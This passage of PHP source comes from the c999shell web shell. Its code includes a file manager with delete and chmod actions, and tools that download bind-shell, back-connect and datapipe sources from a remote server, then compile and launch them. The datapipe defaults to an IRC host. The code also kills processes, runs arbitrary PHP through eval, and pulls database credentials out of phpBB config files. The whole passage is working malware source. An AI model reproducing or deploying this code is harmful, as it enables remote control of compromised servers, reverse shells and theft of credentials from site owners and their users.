- $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
- $tab = array();
- $tab["cols"] = array($row);
- $tab["head"] = array();
- $tab["folders"] = array();
- $tab["links"] = array();
- $tab["files"] = array();
- $i = 0;
- foreach ($objects as $a)
- {
- $v = $a[0];
- $o = basename($v);
- $dir = dirname($v);
- if ($disp_fullpath) {$disppath = $v;}
- else {$disppath = $o;}
- $disppath = str2mini($disppath,60);
- if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
- elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
- foreach ($regxp_highlight as $r)
- {
- if (ereg($r[0],$o))
- {
- if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c999shexit();}
- else
- {
- $r[1] = round($r[1]);
- $isdir = is_dir($v);
- if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
- {
- if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
- $disppath = $r[2].$disppath.$r[3];
- if ($r[4]) {break;}
- }
- }
- }
- }
- $uo = urlencode($o);
- $ud = urlencode($dir);
- $uv = urlencode($v);
- $row = array();
- if ($o == ".")
- {
- $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\"> <a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
- $row[] = "LINK";
- }
- elseif ($o == "..")
- {
- $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\"> <a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
- $row[] = "LINK";
- }
- elseif (is_dir($v))
- {
- if (is_link($v))
- {
- $disppath .= " => ".readlink($v);
- $type = "LINK";
- $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\"> <a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
- }
- else
- {
- $type = "DIR";
- $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\"> <a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
- }
- $row[] = $type;
- }
- elseif(is_file($v))
- {
- $ext = explode(".",$o);
- $c = count($ext)-1;
- $ext = $ext[$c];
- $ext = strtolower($ext);
- $row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\"> <a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
- $row[] = view_size($a[1]);
- }
- $row[] = date("d.m.Y H:i:s",$a[2]);
- if (!$win) {$row[] = $a[3];}
- $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
- if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
- else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
- if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a> ".$checkbox;}
- else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a> <a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a> <a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a> ".$checkbox;}
- if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
- elseif (is_link($v)) {$tab["links"][] = $row;}
- elseif (is_dir($v)) {$tab["folders"][] = $row;}
- elseif (is_file($v)) {$tab["files"][] = $row;}
- $i++;
- }
- }
- // Compiling table
- $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
- echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
- foreach($table as $row)
- {
- echo "<tr>\r\n";
- foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
- echo "</tr>\r\n";
- }
- echo "</table><hr size=\"1\" noshade><p align=\"right\">
- <script>
- function ls_setcheckboxall(status)
- {
- var id = 1;
- var num = ".(count($table)-2).";
- while (id <= num)
- {
- document.getElementById('actbox'+id).checked = status;
- id++;
- }
- }
- function ls_reverse_all()
- {
- var id = 1;
- var num = ".(count($table)-2).";
- while (id <= num)
- {
- document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
- id++;
- }
- }
- </script>
- <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\"> <input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">
- <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
- if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
- {
- echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\"> <input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\"> <input type=submit name=\"actpastebuff\" value=\"Paste\"> <input type=submit name=\"actemptybuff\" value=\"Empty buffer\"> ";
- }
- echo "<select name=act><option value=\"".$act."\">With selected:</option>";
- echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
- echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
- if ($usefsbuff)
- {
- echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
- echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
- echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
- }
- echo "</select> <input type=submit value=\"Confirm\"></p>";
- echo "</form>";
- }
- }
- if ($act == "tools")
- {
- $bndportsrcs = array(
- "c999sh_bindport.pl"=>array("Using PERL","perl %path %port"),
- "c999sh_bindport.c"=>array("Using C","%path %port %pass")
- );
- $bcsrcs = array(
- "c999sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
- "c999sh_backconn.c"=>array("Using C","%path %host %port")
- );
- $dpsrcs = array(
- "c999sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
- "c999sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
- );
- if (!is_array($bind)) {$bind = array();}
- if (!is_array($bc)) {$bc = array();}
- if (!is_array($datapipe)) {$datapipe = array();}
- if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
- if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
- if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
- if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
- if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.blade83.de:6667";}
- if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
- if (!empty($bindsubmit))
- {
- echo "<b>Result of binding port:</b><br>";
- $v = $bndportsrcs[$bind["src"]];
- if (empty($v)) {echo "Unknown file!<br>";}
- elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
- else
- {
- $w = explode(".",$bind["src"]);
- $ext = $w[count($w)-1];
- unset($w[count($w)-1]);
- $srcpath = join(".",$w).".".rand(0,999).".".$ext;
- $binpath = $tmpdir.join(".",$w).rand(0,999);
- if ($ext == "pl") {$binpath = $srcpath;}
- @unlink($srcpath);
- $fp = fopen($srcpath,"ab+");
- if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
- elseif (!$data = c999getsource($bind["src"])) {echo "Can't download sources!";}
- else
- {
- fwrite($fp,$data,strlen($data));
- fclose($fp);
- if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
- $v[1] = str_replace("%path",$binpath,$v[1]);
- $v[1] = str_replace("%port",$bind["port"],$v[1]);
- $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
- $v[1] = str_replace("//","/",$v[1]);
- $retbind = myshellexec($v[1]." > /dev/null &");
- sleep(5);
- $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
- if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
- else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat©, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
- }
- echo "<br>";
- }
- }
- if (!empty($bcsubmit))
- {
- echo "<b>Result of back connection:</b><br>";
- $v = $bcsrcs[$bc["src"]];
- if (empty($v)) {echo "Unknown file!<br>";}
- else
- {
- $w = explode(".",$bc["src"]);
- $ext = $w[count($w)-1];
- unset($w[count($w)-1]);
- $srcpath = join(".",$w).".".rand(0,999).".".$ext;
- $binpath = $tmpdir.join(".",$w).rand(0,999);
- if ($ext == "pl") {$binpath = $srcpath;}
- @unlink($srcpath);
- $fp = fopen($srcpath,"ab+");
- if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
- elseif (!$data = c999getsource($bc["src"])) {echo "Can't download sources!";}
- else
- {
- fwrite($fp,$data,strlen($data));
- fclose($fp);
- if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
- $v[1] = str_replace("%path",$binpath,$v[1]);
- $v[1] = str_replace("%host",$bc["host"],$v[1]);
- $v[1] = str_replace("%port",$bc["port"],$v[1]);
- $v[1] = str_replace("//","/",$v[1]);
- $retbind = myshellexec($v[1]." > /dev/null &");
- echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
- }
- }
- }
- if (!empty($dpsubmit))
- {
- echo "<b>Result of datapipe-running:</b><br>";
- $v = $dpsrcs[$datapipe["src"]];
- if (empty($v)) {echo "Unknown file!<br>";}
- elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
- else
- {
- $srcpath = $tmpdir.$datapipe["src"];
- $w = explode(".",$datapipe["src"]);
- $ext = $w[count($w)-1];
- unset($w[count($w)-1]);
- $srcpath = join(".",$w).".".rand(0,999).".".$ext;
- $binpath = $tmpdir.join(".",$w).rand(0,999);
- if ($ext == "pl") {$binpath = $srcpath;}
- @unlink($srcpath);
- $fp = fopen($srcpath,"ab+");
- if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
- elseif (!$data = c999getsource($datapipe["src"])) {echo "Can't download sources!";}
- else
- {
- fwrite($fp,$data,strlen($data));
- fclose($fp);
- if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
- list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
- $v[1] = str_replace("%path",$binpath,$v[1]);
- $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
- $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
- $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
- $v[1] = str_replace("//","/",$v[1]);
- $retbind = myshellexec($v[1]." > /dev/null &");
- sleep(5);
- $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
- if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
- else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat©, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";}
- }
- echo "<br>";
- }
- }
- ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>"> Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>"> <select name="bind[src]"><?php
- foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
- ?></select> <input type=submit name=bindsubmit value="Bind"></form>
- <b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>"> Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>"> <select name="bc[src]"><?php
- foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
- ?></select> <input type=submit name=bcsubmit value="Connect"></form>
- Click "Connect" only after open port for it. You should use NetCat©, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
- <b>Datapipe:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>"> Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>"> <select name="datapipe[src]"><?php
- foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
- ?></select> <input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php
- }
- if ($act == "processes")
- {
- echo "<b>Processes:</b><br>";
- if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
- else {$handler = "tasklist";}
- $ret = myshellexec($handler);
- if (!$ret) {echo "Can't execute \"".$handler."\"!";}
- else
- {
- if (empty($processes_sort)) {$processes_sort = $sort_default;}
- $parsesort = parsesort($processes_sort);
- if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
- $k = $parsesort[0];
- if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
- else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
- $ret = htmlspecialchars($ret);
- if (!$win)
- {
- if ($pid)
- {
- if (is_null($sig)) {$sig = 9;}
- echo "Sending signal ".$sig." to #".$pid."... ";
- if (posix_kill($pid,$sig)) {echo "OK.";}
- else {echo "ERROR.";}
- }
- while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
- $stack = explode("\n",$ret);
- $head = explode(" ",$stack[0]);
- unset($stack[0]);
- for($i=0;$i<count($head);$i++)
- {
- if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
- }
- $prcs = array();
- foreach ($stack as $line)
- {
- if (!empty($line))
- {
- echo "<tr>";
- $line = explode(" ",$line);
- $line[10] = join(" ",array_slice($line,10));
- $line = array_slice($line,0,11);
- if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
- $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
- $prcs[] = $line;
- echo "</tr>";
- }
- }
- }
- else
- {
- while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
- while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
- while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
- while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
- while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
- while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
- while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
- while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
- while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
- while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
- while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
- $ret = convert_cyr_string($ret,"d","w");
- $stack = explode("\n",$ret);
- unset($stack[0],$stack[2]);
- $stack = array_values($stack);
- $head = explode("",$stack[0]);
- $head[1] = explode(" ",$head[1]);
- $head[1] = $head[1][0];
- $stack = array_slice($stack,1);
- unset($head[2]);
- $head = array_values($head);
- if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
- else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
- if ($k > count($head)) {$k = count($head)-1;}
- for($i=0;$i<count($head);$i++)
- {
- if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
- }
- $prcs = array();
- foreach ($stack as $line)
- {
- if (!empty($line))
- {
- echo "<tr>";
- $line = explode("",$line);
- $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
- $line[2] = intval(str_replace(" ","",$line[2]))*1024;
- $prcs[] = $line;
- echo "</tr>";
- }
- }
- }
- $head[$k] = "<b>".$head[$k]."</b>".$y;
- $v = $processes_sort[0];
- usort($prcs,"tabsort");
- if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
- $tab = array();
- $tab[] = $head;
- $tab = array_merge($tab,$prcs);
- echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
- foreach($tab as $i=>$k)
- {
- echo "<tr>";
- foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
- echo "</tr>";
- }
- echo "</table>";
- }
- }
- if ($act == "eval")
- {
- if (!empty($eval))
- {
- echo "<b>Result of execution this PHP-code</b>:<br>";
- $tmp = ob_get_contents();
- $olddir = realpath(".");
- @chdir($d);
- if ($tmp)
- {
- ob_clean();
- eval($eval);
- $ret = ob_get_contents();
- $ret = convert_cyr_string($ret,"d","w");
- ob_clean();
- echo $tmp;
- if ($eval_txt)
- {
- $rows = count(explode("\r\n",$ret))+1;
- if ($rows < 10) {$rows = 10;}
- echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
- }
- else {echo $ret."<br>";}
- }
- else
- {
- if ($eval_txt)
- {
- echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
- eval($eval);
- echo "</textarea>";
- }
- else {echo $ret;}
- }
- @chdir($olddir);
- }
- else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
- echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\"> Display in text-area <input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
- }
- if ($act == "f")
- {
- if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
- {
- if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
- else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
- }
- else
- {
- $r = @file_get_contents($d.$f);
- $ext = explode(".",$f);
- $c = count($ext)-1;
- $ext = $ext[$c];
- $ext = strtolower($ext);
- $rft = "";
- foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
- if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
- if (empty($ft)) {$ft = $rft;}
- $arr = array(
- array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
- array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
- array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
- array("Code","code"),
- array("Session","phpsess"),
- array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
- array("SDB","sdb"),
- array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
- array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
- array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
- array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
- array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
- );
- echo "<b>Viewing file: <img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\"> ".$f." (".view_size(filesize($d.$f)).") ".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
- foreach($arr as $t)
- {
- if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
- elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
- else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
- echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
- }
- echo "<hr size=\"1\" noshade>";
- if ($ft == "info")
- {
- echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
- if (!$win)
- {
- echo "<tr><td><b>Owner/Group</b></td><td> ";
- $ow = posix_getpwuid(fileowner($d.$f));
- $gr = posix_getgrgid(filegroup($d.$f));
- echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
- }
- echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
- $fi = fopen($d.$f,"rb");
- if ($fi)
- {
- if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
- else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
- $n = 0;
- $a0 = "00000000<br>";
- $a1 = "";
- $a2 = "";
- for ($i=0; $i<strlen($str); $i++)
- {
- $a1 .= sprintf("%02X",ord($str[$i]))." ";
- switch (ord($str[$i]))
- {
- case 0: $a2 .= "<font>0</font>"; break;
- case 32:
- case 10:
- case 13: $a2 .= " "; break;
- default: $a2 .= htmlspecialchars($str[$i]);
- }
- $n++;
- if ($n == $hexdump_rows)
- {
- $n = 0;
- if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
- $a1 .= "<br>";
- $a2 .= "<br>";
- }
- }
- //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
- echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
- }
- $encoded = "";
- if ($base64 == 1)
- {
- echo "<b>Base64 Encode</b><br>";
- $encoded = base64_encode(file_get_contents($d.$f));
- }
- elseif($base64 == 2)
- {
- echo "<b>Base64 Encode + Chunk</b><br>";
- $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
- }
- elseif($base64 == 3)
- {
- echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
- $encoded = base64_encode(file_get_contents($d.$f));
- $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
- }
- elseif($base64 == 4)
- {
- $text = file_get_contents($d.$f);
- $encoded = base64_decode($text);
- echo "<b>Base64 Decode";
- if (base64_encode($encoded) != $text) {echo " (failed)";}
- echo "</b><br>";
- }
- if (!empty($encoded))
- {
- echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
- }
- echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
- <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>] </nobr>
- <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>] </nobr>
- <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>] </nobr>
- <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>] </nobr>
- <P>";
- }
- elseif ($ft == "html")
- {
- if ($white) {@ob_clean();}
- echo $r;
- if ($white) {c999shexit();}
- }
- elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
- elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
- elseif ($ft == "phpsess")
- {
- echo "<pre>";
- $v = explode("|",$r);
- echo $v[0]."<br>";
- var_dump(unserialize($v[1]));
- echo "</pre>";
- }
- elseif ($ft == "exe")
- {
- $ext = explode(".",$f);
- $c = count($ext)-1;
- $ext = $ext[$c];
- $ext = strtolower($ext);
- $rft = "";
- foreach($exeftypes as $k=>$v)
- {
- if (in_array($ext,$v)) {$rft = $k; break;}
- }
- $cmd = str_replace("%f%",$f,$rft);
- echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
- }
- elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
- elseif ($ft == "code")
- {
- if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
- {
- $arr = explode("\n",$r);
- if (count($arr == 18))
- {
- include($d.$f);
- echo "<b>phpBB configuration is detected in this file!<br>";
- if ($dbms == "mysql4") {$dbms = "mysql";}
- if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
- else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c999shell. Please, report us for fix.";}
- echo "Parameters for manual connect:<br>";
- $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
- foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
- echo "</b><hr size=\"1\" noshade>";
- }
- }
